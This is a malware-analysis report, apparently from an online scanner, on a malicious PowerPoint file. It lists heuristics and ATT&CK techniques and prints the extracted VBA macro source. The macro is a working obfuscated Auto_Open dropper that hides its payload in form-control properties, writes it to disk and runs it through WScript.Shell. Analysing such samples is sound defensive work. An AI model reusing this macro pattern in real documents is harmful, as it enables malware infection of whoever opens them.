MALICIOUS
260
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The OOXML document contains a VBA project with an Auto_Open macro, which is a common technique for executing malicious code upon opening the document. The script utilizes WScript.Shell to execute a command, likely to download and run a secondary payload. The obfuscated string manipulation and the use of 'WScript.Shell' and 'CreateObject' strongly indicate a downloader or droppper functionality.
Heuristics 6
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usage
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1582 bytes |
SHA-256: 1158b063f45fd66226e2939a27a1a111e68da90abd23a904657d891fa6727d0e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "dasOxPj"
Public fLVgCOW As New yDqqMJM
Sub iucTCFt()
fLVgCOW.fBCYHOa
End Sub
Attribute VB_Name = "rbDNZln"
Attribute VB_Base = "0{F36C00B2-36DA-457A-8078-D72933F72A67}{7737DD57-4184-46EF-A0C6-3D5384A74331}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "yDqqMJM"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Function ikRcTfj(cDRWdnC)
ikRcTfj = Replace(cDRWdnC, "03Nc@<$}(cpTHvl#u*3]{*.O83qcz6cPj~~qC8b7", "")
End Function
Sub fBCYHOa()
Dim VOxiXNa As String: VOxiXNa = rbDNZln.vnfbObJ.Tag
Dim xaMcWqg As String: xaMcWqg = ikRcTfj(VOxiXNa)
Open xaMcWqg For Output As #1
Dim kNXYjtU As String: kNXYjtU = rbDNZln.vnfbObJ.ControlTipText
Dim HOIzFId As String: HOIzFId = ikRcTfj(kNXYjtU)
Print #1, HOIzFId
Close
On Error Resume Next
AppActivate "Microsoft PowerPoint Services..."
If Err <> 0 Then
Err = 0
Set FszubiS = CreateObject("WScript.Shell")
Set MkypMVG = FszubiS.exEc("C:\Windows\Explorer " & xaMcWqg)
If Err <> 0 Then MsgBox "Can't Stop "
End If
End Sub
Attribute VB_Name = "mLWJOCw"
Public Sub aUtO_oPeN()
dasOxPj.iucTCFt
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: ppt/vbaProject.bin | 38400 bytes |
SHA-256: 9259a1ea128247fd6aff762e90d8763b1b5f06319683cd1070972a3605236908 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.